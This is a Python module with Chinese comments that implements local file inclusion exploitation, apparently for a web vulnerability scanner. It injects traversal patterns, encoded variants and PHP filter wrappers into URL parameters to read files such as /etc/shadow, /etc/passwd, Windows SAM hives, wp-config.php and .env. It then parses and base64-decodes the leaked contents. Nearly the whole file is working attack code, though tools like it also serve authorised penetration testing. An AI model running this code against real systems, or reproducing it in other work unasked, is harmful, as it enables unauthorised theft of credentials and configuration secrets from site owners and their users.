#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
LFI（本地文件包含）漏洞利用模块
"""

import logging
import re
import urllib.parse
import random
import string
import base64

logger = logging.getLogger('xss_scanner')

class LFIExploit:
    """LFI漏洞利用类"""
    
    def __init__(self, http_client):
        """
        初始化LFI漏洞利用模块
        
        Args:
            http_client: HTTP客户端对象
        """
        self.http_client = http_client
        
        # 敏感文件列表
        self.sensitive_files = [
            # Linux系统文件
            "/etc/passwd",
            "/etc/shadow",
            "/etc/hosts",
            "/etc/issue",
            "/etc/group",
            "/etc/motd",
            "/proc/self/environ",
            "/proc/version",
            "/proc/cmdline",
            "/proc/sched_debug",
            "/proc/mounts",
            "/proc/net/tcp",
            "/proc/net/udp",
            "/proc/net/fib_trie",
            "/proc/net/route",
            
            # Windows系统文件
            "C:\\Windows\\system32\\drivers\\etc\\hosts",
            "C:\\Windows\\win.ini",
            "C:\\boot.ini",
            "C:\\Windows\\System32\\config\\SAM",
            "C:\\Windows\\repair\\SAM",
            "C:\\Windows\\System32\\config\\RegBack\\SAM",
            
            # Web服务器配置文件
            "/etc/httpd/conf/httpd.conf",
            "/etc/apache2/apache2.conf",
            "/etc/nginx/nginx.conf",
            "/usr/local/etc/nginx/nginx.conf",
            "/usr/local/nginx/conf/nginx.conf",
            
            # Web应用配置文件
            "/var/www/html/config.php",
            "/var/www/html/wp-config.php",
            "/var/www/html/configuration.php",
            "/var/www/config/config.ini",
            ".env",
            "web.config",
            "config.json",
            "settings.py",
            
            # 日志文件
            "/var/log/apache2/access.log",
            "/var/log/apache2/error.log",
            "/var/log/nginx/access.log",
            "/var/log/nginx/error.log",
            "/var/log/httpd/access_log",
            "/var/log/httpd/error_log",
            "/var/log/apache/access.log",
            "/var/log/apache/error.log",
            "/usr/local/apache/log/error_log",
            "/usr/local/apache2/log/error_log"
        ]
        
        # PHP封装器
        self.php_wrappers = [
            "php://filter/convert.base64-encode/resource=",
            "php://filter/read=convert.base64-encode/resource=",
            "phar://",
            "zip://",
            "data://text/plain;base64,"
        ]
        
        # 目录遍历模式
        self.traversal_patterns = [
            "../",
            "..\\",
            "..%2f",
            "..%5c",
            "%2e%2e%2f",
            "%2e%2e/",
            "..%252f",
            "%252e%252e%252f",
            "....//",
            "....\\\\",
            ".../",
            "...\\",
            "%c0%ae%c0%ae/",
            "%25c0%25ae%25c0%25ae/"
        ]
        
        # 常见参数名
        self.common_parameters = [
            "file", 
            "page", 
            "path", 
            "filepath", 
            "filename", 
            "load", 
            "include", 
            "require", 
            "doc",
            "document", 
            "folder", 
            "root", 
            "cont", 
            "content", 
            "layout",
            "mod", 
            "module", 
            "conf", 
            "config",
            "url", 
            "uri", 
            "source", 
            "src",
            "show", 
            "view", 
            "template"
        ]
        
    def exploit(self, vulnerability):
        """
        利用LFI漏洞
        
        Args:
            vulnerability: 漏洞信息
            
        Returns:
            dict: 利用结果
        """
        logger.info(f"尝试利用LFI漏洞: {vulnerability['url']}")
        
        url = vulnerability.get('url')
        parameter = vulnerability.get('parameter')
        payload = vulnerability.get('payload', '')
        
        if not url or not parameter:
            return {
                'success': False,
                'message': '缺少必要的漏洞信息(URL或参数名)',
                'data': None
            }
            
        # 尝试不同的敏感文件
        for file_path in self.sensitive_files[:10]:  # 只尝试前10个文件
            result = self._try_file_access(url, parameter, file_path)
            if result and result['success']:
                return result
                
        # 如果直接尝试失败，尝试使用PHP包装器（如果目标可能是PHP应用）
        for wrapper in self.php_wrappers[:3]:  # 只尝试前3个包装器
            for file_path in self.sensitive_files[:5]:  # 只尝试前5个文件
                result = self._try_wrapper_access(url, parameter, wrapper, file_path)
                if result and result['success']:
                    return result
                    
        # 如果直接访问和包装器都失败，尝试使用深度目录遍历
        for traversal in self.traversal_patterns[:5]:  # 只尝试前5个遍历模式
            # 尝试不同深度
            for depth in range(1, 11):  # 1到10层深度
                traversal_path = traversal * depth
                for file_path in self.sensitive_files[:3]:  # 只尝试前3个文件
                    result = self._try_traversal_access(url, parameter, traversal_path, file_path)
                    if result and result['success']:
                        return result
                        
        # 如果所有尝试都失败，返回失败结果
        return {
            'success': False,
            'message': '未能成功利用LFI漏洞',
            'data': None
        }
        
    def _try_file_access(self, url, parameter, file_path):
        """
        尝试直接访问文件
        
        Args:
            url: 目标URL
            parameter: 参数名
            file_path: 文件路径
            
        Returns:
            dict: 利用结果
        """
        try:
            logger.info(f"尝试访问文件: {file_path}")
            
            # 构建注入URL
            parsed_url = urllib.parse.urlparse(url)
            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
            query_params[parameter] = file_path
            
            # 重建查询字符串
            new_query = urllib.parse.urlencode(query_params)
            new_url = urllib.parse.urlunparse((
                parsed_url.scheme,
                parsed_url.netloc,
                parsed_url.path,
                parsed_url.params,
                new_query,
                parsed_url.fragment
            ))
            
            # 发送请求
            response = self.http_client.get(new_url)
            
            # 检查响应是否含有敏感文件内容
            if response and response.status_code == 200:
                file_content = self._extract_file_content(response.text, file_path)
                if file_content:
                    logger.info(f"成功读取文件: {file_path}")
                    return {
                        'success': True,
                        'message': f'成功利用LFI漏洞读取文件: {file_path}',
                        'data': {
                            'file_path': file_path,
                            'file_content': file_content[:1000] + ('...' if len(file_content) > 1000 else ''),
                            'full_content_length': len(file_content)
                        },
                        'poc': new_url
                    }
                    
        except Exception as e:
            logger.error(f"尝试访问文件时出错: {str(e)}")
            
        return None
        
    def _try_wrapper_access(self, url, parameter, wrapper, file_path):
        """
        尝试使用PHP包装器访问文件
        
        Args:
            url: 目标URL
            parameter: 参数名
            wrapper: PHP包装器
            file_path: 文件路径
            
        Returns:
            dict: 利用结果
        """
        try:
            payload = wrapper + file_path
            logger.info(f"尝试使用包装器访问文件: {payload}")
            
            # 构建注入URL
            parsed_url = urllib.parse.urlparse(url)
            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
            query_params[parameter] = payload
            
            # 重建查询字符串
            new_query = urllib.parse.urlencode(query_params)
            new_url = urllib.parse.urlunparse((
                parsed_url.scheme,
                parsed_url.netloc,
                parsed_url.path,
                parsed_url.params,
                new_query,
                parsed_url.fragment
            ))
            
            # 发送请求
            response = self.http_client.get(new_url)
            
            # 检查响应是否包含Base64编码内容
            if response and response.status_code == 200:
                # 检查是否包含Base64编码的内容
                base64_content = self._extract_base64_content(response.text)
                if base64_content:
                    try:
                        decoded_content = base64.b64decode(base64_content).decode('utf-8', errors='ignore')
                        logger.info(f"成功使用包装器读取文件: {file_path}")
                        return {
                            'success': True,
                            'message': f'成功利用LFI漏洞使用PHP包装器读取文件: {file_path}',
                            'data': {
                                'file_path': file_path,
                                'wrapper': wrapper,
                                'file_content': decoded_content[:1000] + ('...' if len(decoded_content) > 1000 else ''),
                                'full_content_length': len(decoded_content)
                            },
                            'poc': new_url
                        }
                    except Exception as e:
                        logger.error(f"Base64解码失败: {str(e)}")
                        
        except Exception as e:
            logger.error(f"尝试使用包装器访问文件时出错: {str(e)}")
            
        return None
        
    def _try_traversal_access(self, url, parameter, traversal_path, file_path):
        """
        尝试使用目录遍历访问文件
        
        Args:
            url: 目标URL
            parameter: 参数名
            traversal_path: 目录遍历路径
            file_path: 文件路径
            
        Returns:
            dict: 利用结果
        """
        try:
            # 处理绝对路径，只保留文件名
            if file_path.startswith('/'):
                file_name = file_path.split('/')[-1]
            elif file_path.startswith('C:\\') or file_path.startswith('C:/'):
                file_name = file_path.replace('\\', '/').split('/')[-1]
            else:
                file_name = file_path
                
            payload = traversal_path + file_name
            logger.info(f"尝试使用目录遍历访问文件: {payload}")
            
            # 构建注入URL
            parsed_url = urllib.parse.urlparse(url)
            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
            query_params[parameter] = payload
            
            # 重建查询字符串
            new_query = urllib.parse.urlencode(query_params)
            new_url = urllib.parse.urlunparse((
                parsed_url.scheme,
                parsed_url.netloc,
                parsed_url.path,
                parsed_url.params,
                new_query,
                parsed_url.fragment
            ))
            
            # 发送请求
            response = self.http_client.get(new_url)
            
            # 检查响应是否含有敏感文件内容
            if response and response.status_code == 200:
                file_content = self._extract_file_content(response.text, file_path)
                if file_content:
                    logger.info(f"成功使用目录遍历读取文件: {file_path}")
                    return {
                        'success': True,
                        'message': f'成功利用LFI漏洞使用目录遍历读取文件: {file_path}',
                        'data': {
                            'file_path': file_path,
                            'traversal_pattern': traversal_path,
                            'file_content': file_content[:1000] + ('...' if len(file_content) > 1000 else ''),
                            'full_content_length': len(file_content)
                        },
                        'poc': new_url
                    }
                    
        except Exception as e:
            logger.error(f"尝试使用目录遍历访问文件时出错: {str(e)}")
            
        return None
        
    def _extract_file_content(self, response_text, file_path):
        """
        从响应中提取文件内容
        
        Args:
            response_text: 响应文本
            file_path: 尝试访问的文件路径
            
        Returns:
            str: 提取的文件内容，如果未找到返回None
        """
        # 根据文件类型识别特征
        if '/etc/passwd' in file_path:
            # 查找/etc/passwd文件特征
            if re.search(r"root:.*:0:0:", response_text):
                # 提取完整的passwd文件内容
                passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
                if passwd_lines:
                    return "\n".join(passwd_lines)
                    
        elif '/etc/hosts' in file_path:
            # 查找/etc/hosts文件特征
            if re.search(r"127\.0\.0\.1\s+localhost", response_text):
                # 提取完整的hosts文件内容
                hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
                if hosts_content:
                    return hosts_content.group(1)
                    
        elif 'win.ini' in file_path.lower():
            # 查找win.ini文件特征
            if re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
                # 提取完整的win.ini文件内容
                win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
                if win_ini_content:
                    return win_ini_content.group(1)
                    
        elif 'httpd.conf' in file_path or 'apache' in file_path:
            # 查找Apache配置文件特征
            if re.search(r"<VirtualHost|ServerName|DocumentRoot", response_text):
                # 提取配置文件片段
                apache_content = re.search(r"(ServerName.*?|<VirtualHost.*?|DocumentRoot.*?)(</|\n\n|$)", response_text, re.DOTALL)
                if apache_content:
                    return apache_content.group(1)
                    
        elif 'nginx.conf' in file_path:
            # 查找Nginx配置文件特征
            if re.search(r"server\s*{|http\s*{|location\s*", response_text):
                # 提取配置文件片段
                nginx_content = re.search(r"(server\s*{.*?|http\s*{.*?)(</|\n\n|$)", response_text, re.DOTALL)
                if nginx_content:
                    return nginx_content.group(1)
                    
        elif '.php' in file_path:
            # 查找PHP文件特征
            if re.search(r"<\?php|DB_|PASSWORD|HOST|USER", response_text, re.IGNORECASE):
                # 提取PHP代码片段
                php_content = re.search(r"(<\?php.*?\?>|define\s*\(\s*['\"](DB_|HOST|USER|PASSWORD).*?;)", response_text, re.DOTALL | re.IGNORECASE)
                if php_content:
                    return php_content.group(1)
                    
        elif '.log' in file_path:
            # 查找日志文件特征
            if re.search(r"\[\d{2}/\w{3}/\d{4}.*?\]|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", response_text):
                # 提取日志条目
                log_entries = re.findall(r"(\[\d{2}/\w{3}/\d{4}.*?\].*?)\n", response_text)
                if log_entries:
                    return "\n".join(log_entries[:20]) + ("\n..." if len(log_entries) > 20 else "")
                    
        # 通用文件内容检测
        # 尝试根据文件类型的常见特征来判断是否成功读取到文件内容
        file_extension = file_path.split('.')[-1].lower() if '.' in file_path else ''
        
        if file_extension in ['txt', 'ini', 'conf', 'config', 'json', 'xml', 'yaml', 'yml']:
            # 检查是否包含文件结构特征
            if re.search(r"[\{\}\[\]=:\\><\n]", response_text) and len(response_text) > 20:
                # 返回前1000个字符作为文件内容
                return response_text[:1000]
                
        # 如果无法确定具体文件类型，但响应不是HTML格式，可能是成功的
        if not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE) and len(response_text) > 20:
            # 返回前1000个字符作为文件内容
            return response_text[:1000]
            
        return None
        
    def _extract_base64_content(self, response_text):
        """
        从响应中提取Base64编码内容
        
        Args:
            response_text: 响应文本
            
        Returns:
            str: 提取的Base64内容，如果未找到返回None
        """
        # 查找可能的Base64编码字符串
        base64_pattern = r"([A-Za-z0-9+/]{20,}={0,2})"
        matches = re.findall(base64_pattern, response_text)
        
        # 检查每个匹配项是否是有效的Base64编码
        for match in matches:
            try:
                # 尝试解码
                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
                
                # 检查解码后的内容是否包含敏感信息
                if (re.search(r"<\?php|root:|DOCTYPE|html|password=", decoded, re.IGNORECASE) and 
                    len(decoded) > 20):
                    return match
                    
            except Exception:
                continue
                
        return None